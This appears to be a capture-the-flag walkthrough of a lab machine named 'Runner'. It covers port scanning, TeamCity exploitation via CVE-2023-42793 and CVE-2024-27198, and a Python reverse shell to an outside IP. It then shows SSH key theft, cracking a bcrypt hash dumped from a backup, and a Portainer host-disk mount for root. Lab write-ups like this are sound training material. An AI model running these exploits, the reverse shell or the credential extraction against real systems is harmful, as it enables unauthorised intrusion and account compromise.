TCP Scan

> TARGET=10.129.50.228 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
8000/tcp open  nagios-nsca syn-ack ttl 63 Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • add a DNS entry for the redirect target to the hosts file
echo '10.129.50.228    runner.htb' >> /etc/hosts

UDP scan

> nmap -p- --min-rate=1000 -T4 10.129.50.228 -Pn -sU -vvv -oN nmap_udp_all.nmap
[x]

web enum

  • headers
> curl -I http://runner.htb/
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Apr 2024 22:26:49 GMT
Content-Type: text/html
Content-Length: 16910
Last-Modified: Wed, 03 Apr 2024 14:41:49 GMT
Connection: keep-alive
ETag: "660d6aad-420e"
Accept-Ranges: bytes

> curl -I http://runner.htb:8000/
HTTP/1.1 404 Not Found
Date: Mon, 22 Apr 2024 22:26:55 GMT
Content-Length: 9
Content-Type: text/plain; charset=utf-8
  • dirsearch
> dirsearch -u http://runner.htb/
[18:24:29] 301 -  178B  - /assets  ->  http://runner.htb/assets/
[18:24:29] 403 -  564B  - /assets/

> dirsearch -u http://runner.htb/assets/
[18:41:13] 301 -  178B  - /assets/js  ->  http://runner.htb/assets/js/
[18:42:07] 301 -  178B  - /assets/css  ->  http://runner.htb/assets/css/
[18:42:17] 301 -  178B  - /assets/fonts  ->  http://runner.htb/assets/fonts/
[18:42:22] 301 -  178B  - /assets/img  ->  http://runner.htb/assets/img/

> dirsearch -u http://runner.htb/ -m POST
[18:46:36] 301 -  178B  - /assets  ->  http://runner.htb/assets/
[18:46:36] 403 -  564B  - /assets/

> dirsearch -u http://runner.htb:8000/ -m POST
[18:49:54] 200 -    3B  - /health
[18:50:46] 200 -    9B  - /version

> dirsearch -u http://runner.htb:8000/
[18:35:14] 200 -    3B  - /health
[18:36:11] 200 -    9B  - /version

> curl -i http://runner.htb:8000/health
HTTP/1.1 200 OK
Date: Mon, 22 Apr 2024 22:35:37 GMT
Content-Length: 3
Content-Type: text/plain; charset=utf-8

OK

> curl -i http://runner.htb:8000/version
HTTP/1.1 200 OK
Date: Mon, 22 Apr 2024 22:36:41 GMT
Content-Length: 9
Content-Type: text/plain; charset=utf-8

0.0.0-src
  • subdomain
> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://runner.htb/" -H "Host: FUZZ.runner.htb" --hh 154
[x]
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://runner.htb/" -H "Host: FUZZ.runner.htb" --hh 154
000013170:   401        1 L      9 W        66 Ch       "teamcity"

teamcity.runner.htb

  • TeamCity version 2023.05.3 (build 129390) found
> curl -iL http://teamcity.runner.htb/
HTTP/1.1 401
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 22 Apr 2024 23:16:07 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
TeamCity-Node-Id: MAIN_SERVER
WWW-Authenticate: Basic realm="TeamCity"
WWW-Authenticate: Bearer realm="TeamCity"
Cache-Control: no-store

Authentication required
To login manually go to "/login.html" page
> python3 51884.py -u http://teamcity.runner.htb
=====================================================
*       CVE-2023-42793                              *
*  TeamCity Admin Account Creation                  *
*                                                   *
*  Author: ByteHunter                               *
=====================================================

Token: eyJ0eXAiOiAiVENWMiJ9.Zk01OXVXWmx1b1hWOWtmQzNkU01FVEJETUpj.MmJlOWZhYzEtZTk4OS00ZDZlLThlYzEtMzJlMjJiYWRmN2I5
Successfully exploited!
URL: http://teamcity.runner.htb
Username: city_admintwm5
Password: Main_password!!**
> python3 CVE-2024-27198-RCE.py -t http://teamcity.runner.htb

 _____                     ____ _ _           ____   ____ _____
|_   _|__  __ _ _ __ ___  / ___(_) |_ _   _  |  _ \ / ___| ____|
  | |/ _ \/ _` | '_ ` _ \| |   | | __| | | | | |_) | |   |  _|
  | |  __/ (_| | | | | | | |___| | |_| |_| | |  _ <| |___| |___
  |_|\___|\__,_|_| |_| |_|\____|_|\__|\__, | |_| \_\\____|_____|
                                      |___/
                                                                            Author: @W01fh4cker
                                                                            Github: https://github.com/W01fh4cker

[+] User added successfully, username: er6w8596, password: J0gy6Jbeyf, user ID: 19
[+] The target operating system version is linux
[+] Please start executing commands freely! Type <quit> to end command execution
command > id
uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
  • search for info
command > find / -type f -name id_rsa 2>/dev/null
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
  • for a better shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.65",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • found private key
command > cat /data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
  • log in as user john and read the user flag
john@runner:~$ cat user.txt
33af75aa10ae878176716e37573ccc86

Privilege escalation

  • enumerate inside the previous container as tcuser
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
tcuser         1  0.0  0.0   6980  3360 ?        Ss   Apr22   0:00 /bin/bash /run-server.sh
tcuser        14  0.0  0.0   2616  1708 ?        S    Apr22   0:00 /bin/sh bin/teamcity-server.sh run -config conf/server.xml
tcuser        19  0.0  0.0   2616  1792 ?        S    Apr22   0:00  _ sh /opt/teamcity/bin/teamcity-server-restarter.sh run -config conf/server.xml

[+] Modified interesting files in the last 5mins (limit 100)
/tmp/hsperfdata_tcuser/136
/tmp/hsperfdata_tcuser/266
/opt/teamcity/.gnupg/pubring.kbx
/opt/teamcity/.gnupg/trustdb.gpg
/opt/teamcity/p.sh
/data/teamcity_server/datadir/system/buildserver.log
/data/teamcity_server/datadir/system/buildserver.lck
/data/teamcity_server/datadir/system/caches/buildsMetadata/metadataDB.lck

[+] Backup folders
drwxr-xr-x 2 tcuser tcuser 4096 Aug 24  2023 /opt/teamcity/webapps/ROOT/admin/backup
total 20
-rw-r--r-- 1 tcuser tcuser  3140 Aug 23  2023 backupHistory.jsp
-rw-r--r-- 1 tcuser tcuser   264 Aug 23  2023 backupPage.jsp
-rw-r--r-- 1 tcuser tcuser 12072 Aug 23  2023 backupRun.jsp


/data/teamcity_server/datadir/system/caches/buildsMetadata/metadataDB.data
  • The TeamCity web app has a feature to back up the database: http://teamcity.runner.htb/admin/admin.html?item=backup
  • The user table can then be extracted from the backup archive as shown below
tcuser@647a82f29ca0:/data/teamcity_server/datadir/config$ unzip -p /data/teamcity_server/datadir/backup/TeamCity_Backup_20240423_022953.zip database_dump/users
<City_Backup_20240423_022953.zip database_dump/users
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1713827946821, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, city_admintwm5, $2a$07$rpBbX.ccq7lt3DsR1Ut.YeZFyU4DeIisKrxJLAvaBVlo.u8MXMkeG, , angry-admin@funnybunny.org, 1713827964829, BCRYPT
12, piiixi1y, $2a$07$cSgOHnpLwziQSIvHoO8kRe0VSP.NXJSe3JynLBApWUINilDVGjdNK, , piiixi1y@example.com, 1713830413336, BCRYPT
13, el03v2jo, $2a$07$o97Nx2o8c3goRMtOoRj3q.WX4vDOSMHiMBpsmHfuOJWCIkQgX0kW2, , el03v2jo@example.com, 1713830436816, BCRYPT
14, zezpaqiz, $2a$07$5tep/WV2TB8QQhZQPtaKbuD8caTXjTNXzQA7Aa6eSEb54VGOkOFhG, , zezpaqiz@example.com, 1713830552120, BCRYPT
15, 2ja0xzss, $2a$07$YVC9ntyCrmDufyCG6dXDruBr6h.icrDRbv4DykcECUNBQTlke0I0O, , 2ja0xzss@example.com, 1713830604863, BCRYPT
16, 7p2ikmhv, $2a$07$8CErAJPRKvOjrKVXTVz1S.qP1/wDZaySipQRI/08MdPe56Zrg9pd6, , 7p2ikmhv@example.com, 1713830679865, BCRYPT
17, ox1bdcqk, $2a$07$kE1U..sK5ys4JX.rQf4Ys.G1iAOEE7WUV4hj1YY4DREcv//gLwzGe, , ox1bdcqk@example.com, 1713830724344, BCRYPT
18, lqoc84gf, $2a$07$cQp0.LkxgiYHIG1gxw/2oufts/c/hj3c96TbA2k4V31J3gBrjOFoO, , lqoc84gf@example.com, 1713830752768, BCRYPT
19, er6w8596, $2a$07$mMxKI9vOHSA6do6a6UFTRuCglFx6wBb35Wl7LBxjBUNCM5rB3gNMK, , er6w8596@example.com, 1713831252028, BCRYPT
20, shdphvsh, $2a$07$frXYscs6JvxvHXtP/WR4UuTDauUwgISCUYQh6t8MXiit9nEIqJVuC, , shdphvsh@example.com, 1713832130609, BCRYPT
21, x66tukhq, $2a$07$U/8/5jRSLQetrgPIY6GGWut.HUAd7SqvbFt7trGI1bDcimV99MMrW, , x66tukhq@example.com, 1713837560717, BCRYPT
  • crack matthew's bcrypt hash (result: matthew:piper123)
> echo '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em' > hash
> john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 128 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
piper123         (?)
1g 0:00:01:39 DONE (2024-04-22 22:34) 0.01000g/s 520.8p/s 520.8c/s 520.8C/s pituca..omayra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
  • enumerate on the server as john; there are services listening only on localhost
john@runner:~$ netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::8000                 :::*                    LISTEN      -
  • Forward the local-only ports over SSH
> ssh -i john_id_rsa john@runner.htb -L 9443:127.0.0.1:9443 -L 5005:127.0.0.1:5005 -L 8111:127.0.0.1:8111 -L 9000:127.0.0.1:9000
  • Found portainer.io running at https://localhost:9443/#!/auth
  • 9000 and 9443 belong to Portainer and 8111 to TeamCity; 5005 still needs to be identified
> nmap -p5005 127.0.0.1 -sV -vvv

PORT     STATE SERVICE REASON         VERSION
5005/tcp open  jdwp    syn-ack ttl 64 Java Debug Wire Protocol (Reference Implementation) version 17.0 17.0.7

portainer.io

  • browse to https://localhost:9443/ and log in as matthew

  • Create a volume with the following options. It references the host's /dev/sda2 (the host's system partition), so a container that mounts this volume gets access to the host's file system

device 	/dev/sda2
o 	    defaults
type 	ext4
  • Create a container with the above volume attached and mounted at a path, e.g. /rootfs
image       ubuntu:latest
enable a TTY (interactive console)
  • Then create and run the container, attach to its console, and read the root flag
root@052ccc5f0d71:/# ls rootfs/root/
docker_clean.sh  initial_state.txt  monitor.sh  root.txt
root@052ccc5f0d71:/# cat rootfs/root/root.txt
b5634f743d01f53357d8995a659839fa
root@052ccc5f0d71:/#
